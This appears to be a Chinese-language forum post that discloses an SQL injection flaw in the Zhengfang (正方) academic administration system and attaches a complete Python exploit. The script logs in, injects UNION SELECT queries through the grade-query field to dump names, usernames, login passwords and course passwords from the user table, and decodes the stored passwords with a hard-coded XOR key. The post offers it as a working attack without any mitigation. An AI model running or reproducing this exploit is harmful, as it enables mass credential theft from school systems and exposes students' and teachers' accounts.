杭州正方教务管理系统SQL注射漏洞,可查询任意数据并附带exp

[php]#! /usr/bin/env python # coding=utf-8 import sys import requests url_root = 'http://***.com/' url_login = '' url_query = '' cookie = {} def help(): print 'Usage : ', sys.argv[0], 'user' def login(): global cookie r = requests.get(url_root) t = r.headers['set-cookie'].split(';')[0].split('=') cookie[t[0]] = t[1] postdata = {} t = r.content[r.content.find('__VIEWSTATE') + 20:] t = t[:t.find('"')] postdata['__VIEWSTATE'] = t postdata['TextBox1'] = '****' postdata['TextBox2'] = '****' postdata['Button1'] = '' postdata['Button2'] = '' postdata['RadioButtonList1'] = '学生'.decode('utf-8').encode('gbk') r = requests.post(url_login, cookies=cookie, data=postdata) if len(r.history) == 0: print '登陆失败' sys.exit() def query(sql): global url_query, cookie result = [] header = {} header['Referer'] = url_root header['Host'] = '****' r = requests.get(url_query, cookies=cookie, headers=header) t = r.content.decode('gbk').encode('utf-8') t = t[t.find('__VIEWSTATE')+20:] t = t[:t.find('"')] postdata = {} postdata['__VIEWSTATE'] = t postdata['Dropdownlist5'] = '' postdata['Dropdownlist3'] = 'a.xh' postdata['Dropdownlist4'] = '' postdata['Dropdownlist1'] = '' postdata['Dropdownlist2'] = '' postdata['Button5'] = '查 询'.decode('utf-8').encode('gbk') postdata['TextBox1'] = sql r = requests.post(url_query, data=postdata, cookies=cookie, headers=header) t = r.content.decode('gbk').encode('utf-8') t = t[t.find('Dropdownlist4">')+15:] t = t[:t.find('')] while True: pos = t.find('">') if pos == -1: break t = t[pos + 2:] x = t[:t.find('')] t = t[t.find('') + 9:] result.append(x) return result def main(): global url_root, url_login, url_query url_login = url_root + 'default2.aspx' url_query = url_root + 'cjcx.aspx?xh=****'# + sys.argv[2] login() xm = query("888888' union select yhm||xm yhm,xm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) yhm = query("888888' union select yhm||yhm yhm,yhm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) jsmm = query("888888' union select yhm||jsmm yhm,jsmm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) jskcmm = query("888888' union select yhm||jskcmm yhm,jskcmm from yhb where xm like '%" + sys.argv[1].decode('utf-8').encode('gbk')) print '' print '%-12s%-13s%-16s%-16s' % ('姓名', '用户名', '登录密码', '课程密码') print '--------------------------------------------------------' for i in range(len(xm)): xm[i] = xm[i][5:] yhm[i] = yhm[i][5:] jsmm[i] = jsmm[i][5:] jskcmm[i] = jskcmm[i][5:] if len(xm[i]) == 6: xm[i] = xm[i][:3] + ' ' + xm[i][3:] jskcmm[i] = decode(jskcmm[i]) else: yhm[i] = ' ' + yhm[i] jsmm[i] = ' ' + jsmm[i] jskcmm[i] = ' ' + decode(jskcmm[i]) print '%-12s%-10s%-16s%-16s' % (xm[i], yhm[i], jsmm[i], jskcmm[i]) print '' def decode(src): key = 'Encrypt01' str3 = '' num3 = 0 num4 = len(src) if len(src) % 2 == 0: str4 = src[:num4/2] str4 = str4[::-1] str5 = src[num4/2:] str5 = str5[::-1] src = str4 + str5 for i in range(num4): str6 = src[i:i+1] str2 = key[num3:num3+1] if ((ord(str6[0]) ^ ord(str2[0])) < 0x20) or ((ord(str6[0]) ^ ord(str2[0])) > 0x7E) or (ord(str6[0]) < 0) or (ord(str6[0]) > 0xFF): str3 = str3 + str6 else: str3 = str3 + str(chr(ord(str6[0]) ^ ord(str2[0]))) num3 = num3 + 1 if num3 == len(key): num3 = 0 return str3 if __name__ == '__main__': if len(sys.argv) != 2: help() sys.exit() main()[/php]

发表评论